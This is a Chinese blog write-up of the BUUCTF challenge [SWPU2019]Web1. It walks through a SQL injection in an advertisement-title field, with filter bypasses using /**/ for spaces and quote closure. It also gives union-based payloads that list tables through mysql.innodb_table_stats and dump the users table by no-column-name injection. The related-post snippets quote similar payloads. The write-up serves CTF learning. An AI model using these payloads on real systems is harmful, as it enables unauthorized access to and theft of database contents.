BUUCTF：[SWPU2019]Web1

最新推荐文章于 2024-05-14 23:43:15 发布

FW_ENJOEY

最新推荐文章于 2024-05-14 23:43:15 发布

阅读量511

点赞数

分类专栏： CTF_Web_Writeup BUUCTF

本文链接：https://blog.csdn.net/qq_46230755/article/details/111823550

版权

CTF_Web_Writeup 同时被 2 个专栏收录

51 篇文章 3 订阅

订阅专栏

BUUCTF

26 篇文章 1 订阅

订阅专栏

在这里插入图片描述
一个登录页面，先去试着注册一个账号
老样子试图注册admin，发现用户已存在

那先随便注册个123 123进去

然后申请一下发布广告

发现实现了一个留言板的功能，考虑一下有没有存在注入的可能。
申请一个1’发现存在着回显
在这里插入图片描述
fuzz一下，可以发现过滤挺多东西的。比如空格我们可以用/**/替代导致无法使用information_schema库，我们可以通过无列名注入
构造payload

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

手动fuzz后发现存在22列
回显
在这里插入图片描述
直接进行查表

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述
构造最终的payload

-1'union/**/select/**/1, (select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述
flag:

flag{399d645f-29b7-4204-b759-6b2f78673b77}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FW_ENJOEY

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF：[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改

Zero_Adam的博客

02-24

4086

目录：一、自己做：二、不足&&学到的：三、学习WP1.测试看看过滤了那些关键字，（这里要多看看，学学）2.使用无列名注入：这里稍停一下：3.下面学习无列名注入：无列名注入详解：无列名注入详解参考自：本题目的详解写博客只是为了输出学习而已，无他一、自己做：发现了那个广告的地方可能有漏洞二、不足&&学到的：尝试了ssti。却忘记了尝试sql注入。。。过滤了order的时候，可以用group by 来测试有多少行单引号闭合，正常闭合会出错的话，可以,

-------已搬运--BUUCTF：[SWPU2019]Web3 --- jwt 的secret的获取 --- unzip的软练级攻击

Zero_Adam的博客

04-20

1369

目录：000、知识点1.os.path.dirname2. unzip 和下面这个zip一块的，没必要看，遇到题目的时候现搜就行。3. zipfile一、自己做：2.看一看WP二、学到的：三、学习WP 重点，我感觉是 jwt 的那块是个点，有乱码之后要寻找secret，然后可用404来获取jwt的secret，再是unzip的软连接攻击这个东西，以前没见过的。学习一下Linux的软连接，然后再来修改修改 000、知识点 1.os.path.dirname python3 获取当前路径及os.pat

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF: [SWPU2019]Web1

末初的CSDN博客

09-25

754

登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字，例如。但是因为没有字段信息可以查，使用无列名注入直接查内容。然后再之后的对广告名的fuzz测试中发现以下过滤。猜测广告名存在注入，尝试在广告名处输入单引号。，发布的时候并没有任何反应，发布后有个。尝试联合查询、首先需要判断有多少字段，直接报错了，基本确定广告名存在。无法注释就尝试构造闭合。可以查看发布的广告。查表明，因为这里过滤。

无列名注入----CTF例题：[SWPU2019]Web1

最新发布

qq_64395221的博客

05-14

989

1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)as a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,10,21,22/**/&&/**/’1‘=’1---查出users的列名，但没有想要的信息。进入题目后发现有登录和注册接口，直接注册登录。

web buuctf [SWPU2019]Web1

weixin_44214568的博客

04-06

435

考点：无列名注入 1. 登录界面和注册界面，发现admin账号被注册了，fuzz也没爆出密码来；尝试注入，dirsearch也没东西，源码上也没啥东西最后注册了一个账号，登录进去随便填了填，申请过去这是广告详情看url上有个id，尝试着注入，也没发现啥问题，没有地方报错 2.在广告申请栏的标题注入1',在查看广告详情 fuzz，发现or和空格都被过滤了，#和--+也过滤了没法用order by 空格我们可以用/**/绕过 3.在标题处注入1'/*...

buuctf-[SWPU2019]Web1(小宇特详解)

小宇的web博客

02-26

1670

buuctf-[SWPU2019]Web1(小宇特详解) 1.先看题目 2.这里我怀疑是sql注入，尝试了万能密码和sqlmap都没有效果 3.这里发现了有一个注册登录的地方这里自己注册一个，不要注册admin，不要问我怎么知道的。这里进去之后是一个广告信息管理这里使用1’ order by 1# 来测试一下显示标题有敏感词汇这里没有源码只能去手动的测试他过滤了啥最终我发现了她过滤了or # --+和空格这里想一下绕过的方法空格可以用/**/来代替 –+注释符的话就用单引号闭合就o

buuctf [SWPU2019]Web1 1

weixin_45642610的博客

03-13

1667

buuctf [SWPU2019]Web1 1 sql 无列名注入注册登录发布广告 1'测试存在sql注入经测试，or，空格,#被过滤不能用order by测试列数，用group by代替注释符#用,'3代替，数字随便（这里的'相当于闭合了输入语句里参数的右引号，变成'3'字符串,此时整个语句没有注释符）（如果参数不在sql语句末尾，那不是失败了？有无懂哥？）空格用/**/代替 1'/**/group/**/by/**/22,'3 1'/**/group/**/by/**/23,'

BUUCTF——[SWPU2019]Web1 sql无列名注入

m0_62107966的博客

03-19

365

在MYSQL5.6以上的版本中，inndb增加了innodb_index_stats和innodb_table_stats两张表，这两张表中都存储了数据库和其数据表的信息，但是没有存储列名。这里因为回显出来的位数是2，3，我直接查看的第二列，内容如下。数据库保存着mysql所有其他数据库的信息，包括了数据库名，表名，字段名等，无列名注入。适用条件information_schema 数据库跟 performance_schema 一样，都是 MySQL 自带的信息数据库。其中 performance_

[BUUCTF][SWPU2019]Web1

朋克归零膏的博客

10-28

606

无列名注入fuzz过滤词绕过空格。

SWPU2019 Web1(无列名注入、MariaDB)

weixin_52780973的博客

10-31

1037

sql注入、无列名注入、MariaDB

BUUCTF [SWPUCTF 2018]SimplePHP

weixin_45441024的博客

12-01

1205

BUUCTF [SWPUCTF 2018]SimplePHP 打开题目我们很明显的看到了上传文件的板块和查看文件的板块，选择这个上传文件，显示如图我们再选择查看文件的板块，url如图所示我们在’='后面输入我们想要查看的文件，发现直接就给打印出来了，之后我们根据这个查看了几个php文件，得到了如下内容： file.php: <?php header("content-type:text/html;charset=utf-8"); include 'function.php'; inc

BUUCTF-[SWPU2019]Web1（bypass information_schema，无列名注入）

qq_44657899的博客

02-25

2035

登录进去后，首先尝试了union注入，但是发现空格被过滤，于是使用/**/绕过。然后判断列数，但是发现注释符被过滤了，无法使用，于是在SQL语句后加一个单引号闭合后面的语句limit 0,1;'。由于or被禁用，所以order by也无法使用，改为group by，'/**/group/**/by/**/22,' 最后判断出列数有22列，回显位置为2和3. title='/**/union/...

buuctf [SWPU2019]Web1 记录

SopRomeo的博客

03-14

1365

注册进去发现可以发广告，看到这我马上试了试有没有xss漏洞可以发现是存在的。emmmm，我用beef上传那个js代码不行。。可能是我太菜了我觉得这道题应该能用xss漏洞做出来。百度了web 发现广告栏存在sql注入… 学到了，留言板也是放在数据库里的，可能是最近接触xss的缘故没想到吧…太菜了我。我找到的writeup写的太简略了，我这个菜鸡就写的详细点吧… 在title进行常规sql判...

BUUCTF [SWPU2019]Web1

qq_56313338的博客

08-27

274

这里将表命名为 x，并且第2个字段命名为a，第三个字段命名b。这是一道sql二次注入题目，但是注入点并不在登录处。获取当前数据库users表的第二列的所有数据。有很多列(我也不知道为啥这么多列…按照猜测，第三列因该就是密码了。admin的密码就是flag。广告申请处进行sql注入。你会发现过滤了很多关键字。就是查询第二列的所有数据。这里用到了一些绕过技巧。注册一个用户然后登录。

[SWPU2019]Web1

Sk1y的博客

06-12

496

考查点：无列名注入，mysql.innodb_table_stats

[SWPU2019]伟大的侦探

07-27

回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容，我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great"，而在解密过程中还发现了一个密码"wllm_is_the_best_...